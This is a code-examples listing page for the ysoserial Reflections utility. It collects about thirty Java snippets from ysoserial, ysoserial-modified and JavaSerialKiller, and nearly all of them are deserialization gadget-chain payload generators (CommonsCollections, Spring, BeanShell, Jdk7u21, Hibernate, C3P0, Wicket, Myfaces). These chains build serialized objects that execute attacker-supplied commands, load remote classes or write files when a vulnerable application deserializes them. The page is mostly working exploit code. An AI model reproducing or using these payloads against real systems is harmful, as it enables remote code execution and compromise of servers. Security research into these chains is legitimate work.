Java Code Examples for ysoserial.payloads.util.Reflections

The following examples show how to use ysoserial.payloads.util.Reflections. These examples are extracted from open source projects. You can vote up the ones you like or vote down the ones you don't like, and go to the original project or source file by following the links above each example. You may check out the related API usage on the sidebar.
Example 1
Source Project: ysoserial-modified   Source File: CommonsCollections2.java    License: MIT License 6 votes vote down vote up
public Queue<Object> getObject(CmdExecuteHelper cmdHelper) throws Exception {
    
    
	final Object templates = Gadgets.createTemplatesImpl(cmdHelper.getCommandArray());
	// mock method name until armed
	final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);

	// create queue with numbers and basic comparator
	final PriorityQueue<Object> queue = new PriorityQueue<Object>(2,new TransformingComparator(transformer));
	// stub data for replacement later
	queue.add(1);
	queue.add(1);

	// switch method called by comparator
	Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");

	// switch contents of queue
	final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
	queueArray[0] = templates;
	queueArray[1] = 1;

	return queue;
}
 
Example 2
Source Project: ysoserial-modified   Source File: Spring1.java    License: MIT License 6 votes vote down vote up
public Object getObject(CmdExecuteHelper cmdHelper) throws Exception {
	final Object templates = Gadgets.createTemplatesImpl(cmdHelper.getCommandArray());
	
	final ObjectFactory objectFactoryProxy = 
			Gadgets.createMemoitizedProxy(Gadgets.createMap("getObject", templates), ObjectFactory.class);
	
	final Type typeTemplatesProxy = Gadgets.createProxy((InvocationHandler) 
			Reflections.getFirstCtor("org.springframework.beans.factory.support.AutowireUtils$ObjectFactoryDelegatingInvocationHandler")
				.newInstance(objectFactoryProxy), Type.class, Templates.class);
	
	final Object typeProviderProxy = Gadgets.createMemoitizedProxy(
			Gadgets.createMap("getType", typeTemplatesProxy), 
			forName("org.springframework.core.SerializableTypeWrapper$TypeProvider"));
	
	final Constructor mitpCtor = Reflections.getFirstCtor("org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider");
	final Object mitp = mitpCtor.newInstance(typeProviderProxy, Object.class.getMethod("getClass", new Class[] {}), 0);
	Reflections.setFieldValue(mitp, "methodName", "newTransformer");

	return mitp;
}
 
Example 3
Source Project: ysoserial-modified   Source File: CommonsCollections3.java    License: MIT License 6 votes vote down vote up
public Object getObject(CmdExecuteHelper cmdHelper) throws Exception {
    
	Object templatesImpl = Gadgets.createTemplatesImpl(cmdHelper.getCommandArray());

	// inert chain for setup
	final Transformer transformerChain = new ChainedTransformer(
		new Transformer[]{ new ConstantTransformer(1) });
	// real chain for after setup
	final Transformer[] transformers = new Transformer[] {
			new ConstantTransformer(TrAXFilter.class),
			new InstantiateTransformer(
					new Class[] { Templates.class },
					new Object[] { templatesImpl } )};

	final Map innerMap = new HashMap();

	final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

	final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);

	final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);

	Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain

	return handler;
}
 
Example 4
Source Project: ysoserial-modified   Source File: C3P0.java    License: MIT License 6 votes vote down vote up
public Object getObject ( CmdExecuteHelper cmdHelper ) throws Exception {
	
	String command = cmdHelper.getCommand();
    int sep = command.lastIndexOf(':');
    if ( sep < 0 ) {
        throw new IllegalArgumentException("Command format is: <base_url>:<classname>");
    }

    
    String url = command.substring(0, sep);
    String className = command.substring(sep + 1);
    
    PoolBackedDataSource b = Reflections.createWithoutConstructor(PoolBackedDataSource.class);
    Reflections.getField(PoolBackedDataSourceBase.class, "connectionPoolDataSource").set(b, new PoolSource(className, url));
    return b;
}
 
Example 5
Source Project: ysoserial-modified   Source File: Spring2.java    License: MIT License 6 votes vote down vote up
public Object getObject ( CmdExecuteHelper cmdHelper ) throws Exception {
    final Object templates = Gadgets.createTemplatesImpl(cmdHelper.getCommandArray());

    AdvisedSupport as = new AdvisedSupport();
    as.setTargetSource(new SingletonTargetSource(templates));

    final Type typeTemplatesProxy = Gadgets.createProxy(
        (InvocationHandler) Reflections.getFirstCtor("org.springframework.aop.framework.JdkDynamicAopProxy").newInstance(as),
        Type.class,
        Templates.class);

    final Object typeProviderProxy = Gadgets.createMemoitizedProxy(
        Gadgets.createMap("getType", typeTemplatesProxy),
        forName("org.springframework.core.SerializableTypeWrapper$TypeProvider"));

    Object mitp = Reflections.createWithoutConstructor(forName("org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider"));
    Reflections.setFieldValue(mitp, "provider", typeProviderProxy);
    Reflections.setFieldValue(mitp, "methodName", "newTransformer");
    return mitp;
}
 
Example 6
Source Project: ysoserial-modified   Source File: CommonsBeanutils1.java    License: MIT License 6 votes vote down vote up
public Object getObject(CmdExecuteHelper cmdHelper) throws Exception {
  
	final Object templates = Gadgets.createTemplatesImpl(cmdHelper.getCommandArray());
	// mock method name until armed
	final BeanComparator comparator = new BeanComparator("lowestSetBit");

	// create queue with numbers and basic comparator
	final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
	// stub data for replacement later
	queue.add(new BigInteger("1"));
	queue.add(new BigInteger("1"));

	// switch method called by comparator
	Reflections.setFieldValue(comparator, "property", "outputProperties");

	// switch contents of queue
	final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
	queueArray[0] = templates;
	queueArray[1] = templates;

	return queue;
}
 
Example 7
Source Project: ysoserial-modified   Source File: Jdk7u21.java    License: MIT License 6 votes vote down vote up
public Object getObject(CmdExecuteHelper cmdHelper) throws Exception {
	final Object templates = Gadgets.createTemplatesImpl(cmdHelper.getCommandArray());

	String zeroHashCodeStr = "f5a5a608";

	HashMap map = new HashMap();
	map.put(zeroHashCodeStr, "foo");

	InvocationHandler tempHandler = (InvocationHandler) Reflections.getFirstCtor(Gadgets.ANN_INV_HANDLER_CLASS).newInstance(Override.class, map);
	Reflections.setFieldValue(tempHandler, "type", Templates.class);
	Templates proxy = Gadgets.createProxy(tempHandler, Templates.class);

	LinkedHashSet set = new LinkedHashSet(); // maintain order
	set.add(templates);
	set.add(proxy);

	Reflections.setFieldValue(templates, "_auxClasses", null);
	Reflections.setFieldValue(templates, "_class", null);

	map.put(zeroHashCodeStr, templates); // swap in real object

	return set;
}
 
Example 8
Source Project: ysoserial-modified   Source File: Hibernate1.java    License: MIT License 6 votes vote down vote up
static Object makeCaller ( Object tpl, Object getters ) throws NoSuchMethodException, InstantiationException, IllegalAccessException,
        InvocationTargetException, NoSuchFieldException, Exception, ClassNotFoundException {
    PojoComponentTuplizer tup = Reflections.createWithoutConstructor(PojoComponentTuplizer.class);
    Reflections.getField(AbstractComponentTuplizer.class, "getters").set(tup, getters);

    ComponentType t = Reflections.createWithConstructor(ComponentType.class, AbstractType.class, new Class[0], new Object[0]);
    Reflections.setFieldValue(t, "componentTuplizer", tup);
    Reflections.setFieldValue(t, "propertySpan", 1);
    Reflections.setFieldValue(t, "propertyTypes", new Type[] {
        t
    });

    TypedValue v1 = new TypedValue(t, null);
    Reflections.setFieldValue(v1, "value", tpl);
    Reflections.setFieldValue(v1, "type", t);

    TypedValue v2 = new TypedValue(t, null);
    Reflections.setFieldValue(v2, "value", tpl);
    Reflections.setFieldValue(v2, "type", t);

    return Gadgets.makeMap(v1, v2);
}
 
Example 9
Source Project: JavaSerialKiller   Source File: CommonsCollections2.java    License: MIT License 6 votes vote down vote up
public Queue<Object> getObject(final String command) throws Exception {
	final TemplatesImpl templates = Gadgets.createTemplatesImpl(command);
	// mock method name until armed
	final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);

	// create queue with numbers and basic comparator
	final PriorityQueue<Object> queue = new PriorityQueue<Object>(2,new TransformingComparator(transformer));
	// stub data for replacement later
	queue.add(1);
	queue.add(1);

	// switch method called by comparator
	Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");

	// switch contents of queue
	final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
	queueArray[0] = templates;
	queueArray[1] = 1;

	return queue;
}
 
Example 10
Source Project: JavaSerialKiller   Source File: Spring1.java    License: MIT License 6 votes vote down vote up
public Object getObject(final String command) throws Exception {
	final TemplatesImpl templates = Gadgets.createTemplatesImpl(command);
	
	final ObjectFactory objectFactoryProxy = 
			Gadgets.createMemoitizedProxy(Gadgets.createMap("getObject", templates), ObjectFactory.class);
	
	final Type typeTemplatesProxy = Gadgets.createProxy((InvocationHandler) 
			Reflections.getFirstCtor("org.springframework.beans.factory.support.AutowireUtils$ObjectFactoryDelegatingInvocationHandler")
				.newInstance(objectFactoryProxy), Type.class, Templates.class);
	
	final Object typeProviderProxy = Gadgets.createMemoitizedProxy(
			Gadgets.createMap("getType", typeTemplatesProxy), 
			forName("org.springframework.core.SerializableTypeWrapper$TypeProvider"));
	
	final Constructor mitpCtor = Reflections.getFirstCtor("org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider");
	final Object mitp = mitpCtor.newInstance(typeProviderProxy, Object.class.getMethod("getClass", new Class[] {}), 0);
	Reflections.setFieldValue(mitp, "methodName", "newTransformer");

	return mitp;
}
 
Example 11
Source Project: JavaSerialKiller   Source File: BeanShell1.java    License: MIT License 6 votes vote down vote up
public PriorityQueue getObject(String command) throws Exception {
// BeanShell payload
String payload = "compare(Object foo, Object bar) {new java.lang.ProcessBuilder(new String[]{\"" + command + "\"}).start();return new Integer(1);}";

// Create Interpreter
Interpreter i = new Interpreter();

// Evaluate payload
i.eval(payload);

// Create InvocationHandler
XThis xt = new XThis(i.getNameSpace(), i);
InvocationHandler handler = (InvocationHandler) Reflections.getField(xt.getClass(), "invocationHandler").get(xt);

// Create Comparator Proxy
Comparator comparator = (Comparator) Proxy.newProxyInstance(Comparator.class.getClassLoader(), new Class<?>[]{Comparator.class}, handler);

// Prepare Trigger Gadget (will call Comparator.compare() during deserialization)
final PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, comparator);
Object[] queue = new Object[] {1,1};
Reflections.setFieldValue(priorityQueue, "queue", queue);
Reflections.setFieldValue(priorityQueue, "size", 2);

return priorityQueue;
   }
 
Example 12
Source Project: JavaSerialKiller   Source File: CommonsCollections3.java    License: MIT License 6 votes vote down vote up
public Object getObject(final String command) throws Exception {
	TemplatesImpl templatesImpl = Gadgets.createTemplatesImpl(command);

	// inert chain for setup
	final Transformer transformerChain = new ChainedTransformer(
		new Transformer[]{ new ConstantTransformer(1) });
	// real chain for after setup
	final Transformer[] transformers = new Transformer[] {
			new ConstantTransformer(TrAXFilter.class),
			new InstantiateTransformer(
					new Class[] { Templates.class },
					new Object[] { templatesImpl } )};

	final Map innerMap = new HashMap();

	final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

	final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);

	final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);

	Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain

	return handler;
}
 
Example 13
Source Project: JavaSerialKiller   Source File: Jdk7u21.java    License: MIT License 6 votes vote down vote up
public Object getObject(final String command) throws Exception {
	final TemplatesImpl templates = Gadgets.createTemplatesImpl(command);

	String zeroHashCodeStr = "f5a5a608";

	HashMap map = new HashMap();
	map.put(zeroHashCodeStr, "foo");

	InvocationHandler tempHandler = (InvocationHandler) Reflections.getFirstCtor(Gadgets.ANN_INV_HANDLER_CLASS).newInstance(Override.class, map);
	Reflections.setFieldValue(tempHandler, "type", Templates.class);
	Templates proxy = Gadgets.createProxy(tempHandler, Templates.class);

	LinkedHashSet set = new LinkedHashSet(); // maintain order
	set.add(templates);
	set.add(proxy);

	Reflections.setFieldValue(templates, "_auxClasses", null);
	Reflections.setFieldValue(templates, "_class", null);

	map.put(zeroHashCodeStr, templates); // swap in real object

	return set;
}
 
Example 14
public Object getObject(final String command) throws Exception {
	final TemplatesImpl templates = Gadgets.createTemplatesImpl(command);
	// mock method name until armed
	final BeanComparator comparator = new BeanComparator("lowestSetBit");

	// create queue with numbers and basic comparator
	final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
	// stub data for replacement later
	queue.add(new BigInteger("1"));
	queue.add(new BigInteger("1"));

	// switch method called by comparator
	Reflections.setFieldValue(comparator, "property", "outputProperties");

	// switch contents of queue
	final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
	queueArray[0] = templates;
	queueArray[1] = templates;

	return queue;
}
 
Example 15
Source Project: ysoserial   Source File: CommonsCollections2.java    License: MIT License 6 votes vote down vote up
public Queue<Object> getObject(final String command) throws Exception {
	final Object templates = Gadgets.createTemplatesImpl(command);
	// mock method name until armed
	final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);

	// create queue with numbers and basic comparator
	final PriorityQueue<Object> queue = new PriorityQueue<Object>(2,new TransformingComparator(transformer));
	// stub data for replacement later
	queue.add(1);
	queue.add(1);

	// switch method called by comparator
	Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");

	// switch contents of queue
	final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
	queueArray[0] = templates;
	queueArray[1] = 1;

	return queue;
}
 
Example 16
Source Project: ysoserial   Source File: Spring1.java    License: MIT License 6 votes vote down vote up
public Object getObject(final String command) throws Exception {
	final Object templates = Gadgets.createTemplatesImpl(command);

	final ObjectFactory objectFactoryProxy =
			Gadgets.createMemoitizedProxy(Gadgets.createMap("getObject", templates), ObjectFactory.class);

	final Type typeTemplatesProxy = Gadgets.createProxy((InvocationHandler)
			Reflections.getFirstCtor("org.springframework.beans.factory.support.AutowireUtils$ObjectFactoryDelegatingInvocationHandler")
				.newInstance(objectFactoryProxy), Type.class, Templates.class);

	final Object typeProviderProxy = Gadgets.createMemoitizedProxy(
			Gadgets.createMap("getType", typeTemplatesProxy),
			forName("org.springframework.core.SerializableTypeWrapper$TypeProvider"));

	final Constructor mitpCtor = Reflections.getFirstCtor("org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider");
	final Object mitp = mitpCtor.newInstance(typeProviderProxy, Object.class.getMethod("getClass", new Class[] {}), 0);
	Reflections.setFieldValue(mitp, "methodName", "newTransformer");

	return mitp;
}
 
Example 17
Source Project: ysoserial   Source File: CommonsCollections3.java    License: MIT License 6 votes vote down vote up
public Object getObject(final String command) throws Exception {
	Object templatesImpl = Gadgets.createTemplatesImpl(command);

	// inert chain for setup
	final Transformer transformerChain = new ChainedTransformer(
		new Transformer[]{ new ConstantTransformer(1) });
	// real chain for after setup
	final Transformer[] transformers = new Transformer[] {
			new ConstantTransformer(TrAXFilter.class),
			new InstantiateTransformer(
					new Class[] { Templates.class },
					new Object[] { templatesImpl } )};

	final Map innerMap = new HashMap();

	final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

	final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);

	final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);

	Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain

	return handler;
}
 
Example 18
Source Project: ysoserial   Source File: Spring2.java    License: MIT License 6 votes vote down vote up
public Object getObject ( final String command ) throws Exception {
    final Object templates = Gadgets.createTemplatesImpl(command);

    AdvisedSupport as = new AdvisedSupport();
    as.setTargetSource(new SingletonTargetSource(templates));

    final Type typeTemplatesProxy = Gadgets.createProxy(
        (InvocationHandler) Reflections.getFirstCtor("org.springframework.aop.framework.JdkDynamicAopProxy").newInstance(as),
        Type.class,
        Templates.class);

    final Object typeProviderProxy = Gadgets.createMemoitizedProxy(
        Gadgets.createMap("getType", typeTemplatesProxy),
        forName("org.springframework.core.SerializableTypeWrapper$TypeProvider"));

    Object mitp = Reflections.createWithoutConstructor(forName("org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider"));
    Reflections.setFieldValue(mitp, "provider", typeProviderProxy);
    Reflections.setFieldValue(mitp, "methodName", "newTransformer");
    return mitp;
}
 
Example 19
Source Project: ysoserial   Source File: CommonsBeanutils1.java    License: MIT License 6 votes vote down vote up
public Object getObject(final String command) throws Exception {
	final Object templates = Gadgets.createTemplatesImpl(command);
	// mock method name until armed
	final BeanComparator comparator = new BeanComparator("lowestSetBit");

	// create queue with numbers and basic comparator
	final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
	// stub data for replacement later
	queue.add(new BigInteger("1"));
	queue.add(new BigInteger("1"));

	// switch method called by comparator
	Reflections.setFieldValue(comparator, "property", "outputProperties");

	// switch contents of queue
	final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
	queueArray[0] = templates;
	queueArray[1] = templates;

	return queue;
}
 
Example 20
Source Project: ysoserial   Source File: Jdk7u21.java    License: MIT License 6 votes vote down vote up
public Object getObject(final String command) throws Exception {
	final Object templates = Gadgets.createTemplatesImpl(command);

	String zeroHashCodeStr = "f5a5a608";

	HashMap map = new HashMap();
	map.put(zeroHashCodeStr, "foo");

	InvocationHandler tempHandler = (InvocationHandler) Reflections.getFirstCtor(Gadgets.ANN_INV_HANDLER_CLASS).newInstance(Override.class, map);
	Reflections.setFieldValue(tempHandler, "type", Templates.class);
	Templates proxy = Gadgets.createProxy(tempHandler, Templates.class);

	LinkedHashSet set = new LinkedHashSet(); // maintain order
	set.add(templates);
	set.add(proxy);

	Reflections.setFieldValue(templates, "_auxClasses", null);
	Reflections.setFieldValue(templates, "_class", null);

	map.put(zeroHashCodeStr, templates); // swap in real object

	return set;
}
 
Example 21
Source Project: ysoserial   Source File: Hibernate1.java    License: MIT License 6 votes vote down vote up
public static Object makeHibernate4Getter ( Class<?> tplClass, String method ) throws ClassNotFoundException, NoSuchMethodException,
        SecurityException, InstantiationException, IllegalAccessException, IllegalArgumentException, InvocationTargetException {
    Class<?> getterIf = Class.forName("org.hibernate.property.Getter");
    Class<?> basicGetter = Class.forName("org.hibernate.property.BasicPropertyAccessor$BasicGetter");
    Constructor<?> bgCon = basicGetter.getDeclaredConstructor(Class.class, Method.class, String.class);
    Reflections.setAccessible(bgCon);

    if ( !method.startsWith("get") ) {
        throw new IllegalArgumentException("Hibernate4 can only call getters");
    }

    String propName = Character.toLowerCase(method.charAt(3)) + method.substring(4);

    Object g = bgCon.newInstance(tplClass, tplClass.getDeclaredMethod(method), propName);
    Object arr = Array.newInstance(getterIf, 1);
    Array.set(arr, 0, g);
    return arr;
}
 
Example 22
Source Project: ysoserial   Source File: Hibernate1.java    License: MIT License 6 votes vote down vote up
static Object makeHibernate45Caller ( Object tpl, Object getters ) throws NoSuchMethodException, InstantiationException, IllegalAccessException,
        InvocationTargetException, NoSuchFieldException, Exception, ClassNotFoundException {
    PojoComponentTuplizer tup = Reflections.createWithoutConstructor(PojoComponentTuplizer.class);
    Reflections.getField(AbstractComponentTuplizer.class, "getters").set(tup, getters);

    ComponentType t = Reflections.createWithConstructor(ComponentType.class, AbstractType.class, new Class[0], new Object[0]);
    Reflections.setFieldValue(t, "componentTuplizer", tup);
    Reflections.setFieldValue(t, "propertySpan", 1);
    Reflections.setFieldValue(t, "propertyTypes", new Type[] {
        t
    });

    TypedValue v1 = new TypedValue(t, null);
    Reflections.setFieldValue(v1, "value", tpl);
    Reflections.setFieldValue(v1, "type", t);

    TypedValue v2 = new TypedValue(t, null);
    Reflections.setFieldValue(v2, "value", tpl);
    Reflections.setFieldValue(v2, "type", t);

    return Gadgets.makeMap(v1, v2);
}
 
Example 23
Source Project: ysoserial   Source File: MyfacesTest.java    License: MIT License 6 votes vote down vote up
@Override
public Object call () throws Exception {
    java.lang.reflect.Method setFC = FacesContext.class.getDeclaredMethod("setCurrentInstance", FacesContext.class);
    Reflections.setAccessible(setFC);
    ClassLoader oldTCCL = Thread.currentThread().getContextClassLoader();
    Thread.currentThread().setContextClassLoader(this.getClass().getClassLoader());
    FacesContext ctx = createMockFacesContext();
    try {
        setFC.invoke(null, ctx);
        return super.call();
    }
    finally {
        setFC.invoke(null, (FacesContext) null);
        Thread.currentThread().setContextClassLoader(oldTCCL);
    }
}
 
Example 24
Source Project: ysoserial-modified   Source File: CommonsCollections5.java    License: MIT License 5 votes vote down vote up
public BadAttributeValueExpException getObject(CmdExecuteHelper cmdHelper) throws Exception {

		final String[] execArgs = cmdHelper.getCommandArray();
		// inert chain for setup
		final Transformer transformerChain = new ChainedTransformer(
		        new Transformer[]{ new ConstantTransformer(1) });
		// real chain for after setup
		final Transformer[] transformers = new Transformer[] {
				new ConstantTransformer(Runtime.class),
				new InvokerTransformer("getMethod", new Class[] {
					String.class, Class[].class }, new Object[] {
					"getRuntime", new Class[0] }),
				new InvokerTransformer("invoke", new Class[] {
					Object.class, Object[].class }, new Object[] {
					null, new Object[0] }),
				new InvokerTransformer("exec",
					new Class[] { String[].class }, new Object[]{execArgs}),
				new ConstantTransformer(1) };

		final Map innerMap = new HashMap();

		final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
		
		TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
		
		BadAttributeValueExpException val = new BadAttributeValueExpException(null);
		Field valfield = val.getClass().getDeclaredField("val");
		valfield.setAccessible(true);
		valfield.set(val, entry);

		Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain

		return val;
	}
 
Example 25
Source Project: ysoserial-modified   Source File: JSON1.java    License: MIT License 5 votes vote down vote up
/**
 * Will call all getter methods on payload that are defined in the given interfaces
 */
public static Map makeCallerChain ( Object payload, Class... ifaces ) throws OpenDataException, NoSuchMethodException, InstantiationException,
        IllegalAccessException, InvocationTargetException, Exception, ClassNotFoundException {
    CompositeType rt = new CompositeType("a", "b", new String[] {
        "a"
    }, new String[] {
        "a"
    }, new OpenType[] {
        javax.management.openmbean.SimpleType.INTEGER
    });
    TabularType tt = new TabularType("a", "b", rt, new String[] {
        "a"
    });
    TabularDataSupport t1 = new TabularDataSupport(tt);
    TabularDataSupport t2 = new TabularDataSupport(tt);

    // we need to make payload implement composite data
    // it's very likely that there are other proxy impls that could be used
    AdvisedSupport as = new AdvisedSupport();
    as.setTarget(payload);
    InvocationHandler delegateInvocationHandler = (InvocationHandler) Reflections
            .getFirstCtor("org.springframework.aop.framework.JdkDynamicAopProxy").newInstance(as);
    InvocationHandler cdsInvocationHandler = Gadgets.createMemoizedInvocationHandler(Gadgets.createMap("getCompositeType", rt));
    CompositeInvocationHandlerImpl invocationHandler = new CompositeInvocationHandlerImpl();
    invocationHandler.addInvocationHandler(CompositeData.class, cdsInvocationHandler);
    invocationHandler.setDefaultHandler(delegateInvocationHandler);
    final CompositeData cdsProxy = Gadgets.createProxy(invocationHandler, CompositeData.class, ifaces);

    JSONObject jo = new JSONObject();
    Map m = new HashMap();
    m.put("t", cdsProxy);
    Reflections.setFieldValue(jo, "properties", m);
    Reflections.setFieldValue(jo, "properties", m);
    Reflections.setFieldValue(t1, "dataMap", jo);
    Reflections.setFieldValue(t2, "dataMap", jo);
    return Gadgets.makeMap(t1, t2);
}
 
Example 26
Source Project: ysoserial-modified   Source File: Wicket1.java    License: MIT License 5 votes vote down vote up
private static DiskFileItem makePayload(int thresh, String repoPath, String filePath, byte[] data) throws IOException, Exception {
    // if thresh < written length, delete outputFile after copying to repository temp file
    // otherwise write the contents to repository temp file
    File repository = new File(repoPath);
    DiskFileItem diskFileItem = new DiskFileItem("test", "application/octet-stream", false, "test", 100000, repository, null);
    File outputFile = new File(filePath);
    DeferredFileOutputStream dfos = new DeferredFileOutputStream(thresh, outputFile);
    OutputStream os = (OutputStream) Reflections.getFieldValue(dfos, "memoryOutputStream");
    os.write(data);
    Reflections.getField(ThresholdingOutputStream.class, "written").set(dfos, data.length);
    Reflections.setFieldValue(diskFileItem, "dfos", dfos);
    Reflections.setFieldValue(diskFileItem, "sizeThreshold", 0);
    return diskFileItem;
}
 
Example 27
Source Project: ysoserial-modified   Source File: Myfaces1.java    License: MIT License 5 votes vote down vote up
public static Object makeExpressionPayload ( String expr ) throws IllegalArgumentException, IllegalAccessException, Exception  {
    FacesContextImpl fc = new FacesContextImpl((ServletContext) null, (ServletRequest) null, (ServletResponse) null);
    ELContext elContext = new FacesELContext(new CompositeELResolver(), fc);
    Reflections.getField(FacesContextImplBase.class, "_elContext").set(fc, elContext);
    ExpressionFactory expressionFactory = ExpressionFactory.newInstance();
    
    ValueExpression ve1 = expressionFactory.createValueExpression(elContext, expr, Object.class);
    ValueExpressionMethodExpression e = new ValueExpressionMethodExpression(ve1);
    ValueExpression ve2 = expressionFactory.createValueExpression(elContext, "${true}", Object.class);
    ValueExpressionMethodExpression e2 = new ValueExpressionMethodExpression(ve2);

    return Gadgets.makeMap(e2, e);
}
 
Example 28
Source Project: ysoserial-modified   Source File: CommonsCollections4.java    License: MIT License 5 votes vote down vote up
public Queue<Object> getObject(CmdExecuteHelper cmdHelper) throws Exception {
    
	Object templates = Gadgets.createTemplatesImpl(cmdHelper.getCommandArray());

	ConstantTransformer constant = new ConstantTransformer(String.class);

	// mock method name until armed
	Class[] paramTypes = new Class[] { String.class };
	Object[] args = new Object[] { "foo" };
	InstantiateTransformer instantiate = new InstantiateTransformer(
			paramTypes, args);

	// grab defensively copied arrays
	paramTypes = (Class[]) Reflections.getFieldValue(instantiate, "iParamTypes");
	args = (Object[]) Reflections.getFieldValue(instantiate, "iArgs");

	ChainedTransformer chain = new ChainedTransformer(new Transformer[] { constant, instantiate });

	// create queue with numbers
	PriorityQueue<Object> queue = new PriorityQueue<Object>(2, new TransformingComparator(chain));
	queue.add(1);
	queue.add(1);

	// swap in values to arm
	Reflections.setFieldValue(constant, "iConstant", TrAXFilter.class);
	paramTypes[0] = Templates.class;
	args[0] = templates;

	return queue;
}
 
Example 29
Source Project: ysoserial-modified   Source File: CommonsCollections1.java    License: MIT License 5 votes vote down vote up
public InvocationHandler getObject(CmdExecuteHelper cmdHelper) throws Exception {

		final String[] execArgs = cmdHelper.getCommandArray();
		// inert chain for setup
		final Transformer transformerChain = new ChainedTransformer(
			new Transformer[]{ new ConstantTransformer(1) });
		// real chain for after setup
		final Transformer[] transformers = new Transformer[] {
				new ConstantTransformer(Runtime.class),
				new InvokerTransformer("getMethod", new Class[] {
					String.class, Class[].class }, new Object[] {
					"getRuntime", new Class[0] }),
				new InvokerTransformer("invoke", new Class[] {
					Object.class, Object[].class }, new Object[] {
					null, new Object[0] }),
				new InvokerTransformer("exec",
					new Class[] { String[].class }, new Object[]{execArgs}),
				new ConstantTransformer(1) };

		final Map innerMap = new HashMap();

		final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
		
		final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);
		
		final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);
		
		Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain	
				
		return handler;
	}
 
Example 30
Source Project: ysoserial-modified   Source File: BeanShell1.java    License: MIT License 5 votes vote down vote up
public PriorityQueue getObject(CmdExecuteHelper cmdHelper) throws Exception {
   	

// BeanShell payload
String payload = "compare(Object foo, Object bar) {new java.lang.ProcessBuilder(new String[]{" + Arrays.toString(cmdHelper.getCommandArray()) + "}).start();return new Integer(1);}";

// Create Interpreter
Interpreter i = new Interpreter();

// Evaluate payload
i.eval(payload);

// Create InvocationHandler
XThis xt = new XThis(i.getNameSpace(), i);
InvocationHandler handler = (InvocationHandler) Reflections.getField(xt.getClass(), "invocationHandler").get(xt);

// Create Comparator Proxy
Comparator comparator = (Comparator) Proxy.newProxyInstance(Comparator.class.getClassLoader(), new Class<?>[]{Comparator.class}, handler);

// Prepare Trigger Gadget (will call Comparator.compare() during deserialization)
final PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, comparator);
Object[] queue = new Object[] {1,1};
Reflections.setFieldValue(priorityQueue, "queue", queue);
Reflections.setFieldValue(priorityQueue, "size", 2);

return priorityQueue;
   }